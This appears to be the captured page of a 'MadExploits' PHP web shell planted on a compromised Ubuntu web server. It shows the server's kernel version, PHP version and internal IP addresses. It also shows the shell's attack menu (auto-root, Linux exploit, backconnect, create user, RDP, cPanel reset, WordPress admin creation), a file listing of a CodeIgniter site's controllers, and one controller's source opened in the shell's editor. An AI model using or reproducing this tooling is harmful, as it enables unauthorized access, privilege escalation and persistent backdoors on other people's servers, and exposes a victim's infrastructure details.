Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
11-05-Publication.php
1.2
KB
-rwxr-x--x
260923-Events.php
1.62
KB
-rwxr-x--x
Ablog.php
17.92
KB
-rwxr-x--x
Artist.php
372
B
-rwxr-x--x
Blog.php
1.71
KB
-rwxr-x--x
Cat.php
19.11
KB
-rwxr-x--x
Contact.php
4.03
KB
-rwxr-x--x
Corse.php
20.35
KB
-rwxr-x--x
Courses.php
1.76
KB
-rwxr-x--x
Dashboard.php
491
B
-rwxr-x--x
Digital.php
373
B
-rwxr-x--x
Event.php
371
B
-rwxr-x--x
Events.php
1.62
KB
-rwxrwxrwx
Evnt.php
21.69
KB
-rwxr-x--x
Faculty.php
602
B
-rwxr-x--x
Fareas.php
1.16
KB
-rwxr-x--x
Home.php
717
B
-rwxr-x--x
Item.php
32.49
KB
-rwxr-x--x
Jobc.php
20.29
KB
-rwxr-x--x
Jobs.php
4.62
KB
-rwxr-x--x
Login.php
3.63
KB
-rwxr-x--x
Mdc.php
15.88
KB
-rwxr-x--x
Media.php
1.14
KB
-rwxr-x--x
Memories.php
481
B
-rwxr-x--x
Mems.php
16.03
KB
-rwxr-x--x
Pages.php
6.05
KB
-rwxr-x--x
Prod.php
5.01
KB
-rwxr-x--x
Profile.php
2.15
KB
-rwxr-x--x
Proj.php
22.41
KB
-rwxr-x--x
Projects.php
1.64
KB
-rwxr-x--x
Projt.php
10.86
KB
-rwxr-x--x
Puba.php
10.95
KB
-rwxr-x--x
Publ.php
22.94
KB
-rwxr-x--x
Publication.php
2.59
KB
-rwxr-x--x
Pubv.php
10.95
KB
-rwxr-x--x
Staff.php
600
B
-rwxr-x--x
Udig.php
10.37
KB
-rwxr-x--x
User.php
25.22
KB
-rwxr-x--x
Workshops.php
1.76
KB
-rwxr-x--x
Wrks.php
20.3
KB
-rwxr-x--x
index.html
131
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Jobs.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Jobs extends CI_Controller { public function __construct() { parent::__construct(); $this->data = $this->gblm->fConfig(); $this->load->library('form_validation'); $this->load->library('Ajax_pagination'); $this->load->model('Jobc_model','stm'); $this->load->model('Pages_model','cms'); $this->perPage = RCRD_PER_PAGE; } public function Index() { $data = $this->data; $data['PRSNT_BLK'] = BLK_LIST; $data['Dtls']=$this->cms->pgDtls("ID='12'"); $Cond="i.STATUS='".STATUS_A."'"; $totalRec = $this->fm->cntCon(''.$this->data['TBL']['JBC'].' AS i',$Cond); $config['target'] = '#RecordList'; $config['base_url'] = base_url().$this->data['PAGE_CL'].'/ajxRecordList'; $config['total_rows'] = $totalRec; $config['per_page'] = $this->perPage; $this->ajax_pagination->initialize($config); $data['total_rows'] = $totalRec; $data['rdList'] = $this->stm->ffList(array('limit'=>$this->perPage),$Cond); $data['cList'] = $this->load->view($this->data['DIR']['LIST'],$data,TRUE); $this->load->view($this->data['DIR']['VIEW'],$data); } public function Details($str1=null,$str2=null) { $data = $this->data; if($str1=='' || $str2=='') { redirect($this->data['URL']['RDR_URL'],$data); } $Id=substr($str1,0,-3); if($Id=='' || (int)$Id<=0 || ($this->fm->cntCon($this->data['TBL']['JBC'],"ID='".$Id."' AND STATUS='".STATUS_A."'" ) <=0)) { redirect($this->data['URL']['RDR_URL'],$data); } $data['Id'] = $str1; $data['ALIAS'] = $str2; $data['PRSNT_BLK'] = BLK_DTLS; $data['Dtls']=$this->cms->pgDtls("ID='12'"); $data['rDtls']=$this->stm->rDtls("ID='".$Id."'"); $this->load->view($this->data['DIR']['VIEW'],$data); } public function AddNew() { $data = $this->data; $Id=$this->input->post('Id'); $alias=$this->input->post('alias'); $this->form_validation->set_rules('FirstName','First Name','trim|required'); $this->form_validation->set_rules('LastName','Last Name','trim|required'); $this->form_validation->set_rules('Email','Email Address','trim|required|valid_email'); $this->form_validation->set_rules('subject','Subject Is Required','trim|required'); $this->form_validation->set_rules('comments','Message Is Required','trim|required'); if ($this->form_validation->run() == FALSE) { $this->session->set_flashdata(STATUS_MSG,$this->lang->line('GL_WRONG_MSG')); $this->session->set_flashdata(STATUS_TYPE,STATUS_ERROR); redirect($this->data['URL']['RDR_URL'], $data); } else { $Subject = "CAI New Job Request"; $NAME=Rsp($this->input->post('FirstName')).' '.Rsp($this->input->post('LastName')); //SEND EMAIL $usrData['NAME'] =CaseU($NAME); $usrData['EMAIL'] =CaseL($this->input->post('Email')); $usrData['SUBJECT'] =CaseL($this->input->post('subject')); $usrData['MESSAGE'] =CaseL($this->input->post('comments')); $Usr_html =$this->load->view($this->data['DIR']['DR_HTML'].'/con-email',$usrData,TRUE); $html=$this->gblm->email_user(ADMIN_EMAIL,$Subject,$Usr_html,ucwords(CaseL($this->input->post('Email'))),CaseU($NAME)); $data = array( 'FNAME' =>Rsp(dbIn($this->input->post('FirstName'))), 'LNAME' =>Rsp(dbIn($this->input->post('LastName'))), 'EMAIL' =>Rsp(dbIn($this->input->post('Email'))), 'SUBJECT' =>Rsp(dbIn($this->input->post('subject'))), 'MESSAGE' =>Rsp(dbIn($this->input->post('comments'))), 'ADATE' =>DB_IN_DT); $dbStatus= $this->fm->addNew($this->data['TBL']['JOB'], $data); if($dbStatus == TRUE) { $this->session->set_flashdata(STATUS_MSG,'Someone from our team will be in touch shortly.'); $this->session->set_flashdata(STATUS_TYPE,'Thank you for your interest!'); redirect($this->data['URL']['RDR_URL'].'/'.$Id.'/'.$alias, $data); }if($dbStatus == FALSE) { $this->session->set_flashdata(STATUS_MSG,$this->lang->line('GL_WRONG_MSG')); $this->session->set_flashdata(STATUS_TYPE,STATUS_ERROR); redirect($this->data['URL']['RDR_URL'].'/'.$Id.'/'.$alias, $data); } } } public function Nsubcrptn() { $data = $this->data; $email=$this->input->post('subsEmail'); if((int)$this->fm->cntCon('subscription',"EMAIL='".CaseL(dbIn($email))."'") > 0) { echo 'You have already Subscribed'; exit; } else { $dbStatus= $this->fm->addNew('subscription',array('EMAIL' =>CaseL(dbIn($email)),'ADATE' =>DB_IN_DT)); if($dbStatus==TRUE) { echo 'Thanks for Subscription'; exit; } else { echo 'Something Wrong!'; exit; } } } }
Close